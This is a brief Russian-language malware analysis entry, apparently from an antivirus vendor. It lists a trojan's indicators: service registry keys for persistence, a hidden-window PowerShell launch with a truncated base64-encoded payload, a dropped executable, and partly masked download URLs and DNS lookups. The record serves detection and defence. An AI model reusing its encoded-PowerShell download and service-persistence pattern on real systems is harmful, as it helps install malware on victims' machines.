Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\setthediagram] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\setthediagram] 'ImagePath' = '"%WINDIR%\SysWOW64\setthediagram.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABNAGEAdQB0AGsAZAB0AHIAcAB6AGYAeQBkAD0AJwBUAHgAZgB5AHYAawBoAHcAJwA7ACQARQBlAHcAbABsAGEAdwBoAHYAdABuACAAPQAgACcAOAA1ADMAJwA7ACQAVgBpAGoAdAB6AG4AbwByAHMAZQB6AGwAcAA9ACcAVwBwAGYAcQBuAGkAcQB...
- %HOMEPATH%\853.exe
- %HOMEPATH%\853.exe
- %HOMEPATH%\853.exe в %WINDIR%\syswow64\setthediagram.exe
- %HOMEPATH%\853.exe
- http://ta####ingshop.com/c1/ftcfak9456/
- http://br####ngnomad.blog/wp-content/rssk34971/
- http://18#.##9.56.216:443/forced/jit/ringin/ via 18#.#89.56.216
- DNS ASK ta####ingshop.com
- DNS ASK qu####utwall.xyz
- DNS ASK br####ngnomad.blog
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABNAGEAdQB0AGsAZAB0AHIAcAB6AGYAeQBkAD0AJwBUAHgAZgB5AHYAawBoAHcAJwA7ACQARQBlAHcAbABsAGEAdwBoAHYAdABuACAAPQAgACcAOAA1ADMAJwA7ACQAVgBpAGoAdAB6AG4AbwByAHMAZQB6AGwAcAA9ACcAVwBwAGYAcQBuAGkAcQB...' (со скрытым окном)